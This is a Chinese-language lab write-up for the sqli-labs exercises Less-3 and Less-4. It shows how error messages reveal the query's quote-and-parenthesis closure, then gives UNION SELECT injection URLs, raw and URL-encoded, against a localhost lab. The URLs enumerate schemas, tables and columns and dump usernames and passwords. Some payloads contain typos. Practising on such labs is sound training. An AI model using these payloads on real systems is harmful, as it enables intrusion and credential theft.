LESS-3和LESS-4（sql注入）

LESS-3
源码：

1、输入？Id=1’后出现错误

错误提示为”2”)LIMIT 0,1’.去掉前后两个单引号，和自己输入的一个单引号后还有两个单引号和一个括号，可推出sql注入中的由单引号和括号和起来的闭合模式。

2、输入：http://127.0.0.1/sqlilabs/Less-3/?id=2’)–+
url编码后：http://127.0.0.1/sqlilabs/Less-3/?id=2')–+

3、输入：http://127.0.0.1/sqlilabs/Less-3/?id=2’) order by 3 --+
URL编码后：http://127.0.0.1/sqlilabs/Less-3/?id=2')%20%20order%20by%203–+

4.查询数据库名
127.0.0.1/sqlilabs/Less-3/?id=-2’) union select 1,(select group_concat(schema_name) from information_schema.schemata),3–+

URL编码后：
http://127.0.0.1/sqlilabs/Less-3/?id=-2’)%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3–+
5、查找数据库名为security下所有的表名：
http://127.0.0.1/sqlilabs/Less-3/?id=-2’) union select 1,(selec group_concat(table_name)from information_schema.table where table_schema=’security’),3–+
URL编码：
http://127.0.0.1/sqlilabs/Less-3/?id=-2’)%20union%20select%201,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),3–+

6、查找表名为user下的列名
http://127.0.0.1/sqlilabs/Less-3/?id=-2’) union select 1,(select group_concat(column_name)from information_schema.columns where table_name= user ),3–+
http://127.0.0.1/sqlilabs/Less-3/?id=-2')%20union%20select%201,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_name=%27user%27),3–+
7、爆出用户名和密码
http://127.0.0.1/sqlilabs/Less-3/?id=-2 ‘) union select 1,username,password from users where id=2 --+
URL编码：
http://127.0.0.1/sqlilabs/Less-3/?id=-2')%20union%20select%201,username,password%20from%20users%20where%20id=2%20–+

LESS4:
源码：

输入：
127.0.0.1/sqlilabs/Less-4/id=1’后没有出现错误提示：
输入：127.0.0.1/sqlilabs/Less-4/id=1”后
出现的错误提示为’”1””)LIMIT 0,1’,在扣除收尾的单引号，和自己加入的双引号还留有一对双引号和括号。故sql注入出是以双引号和括号闭合的。

输入：http://127.0.0.1/sqlilabs/Less-4/?id=2”)–+
其余的类比3.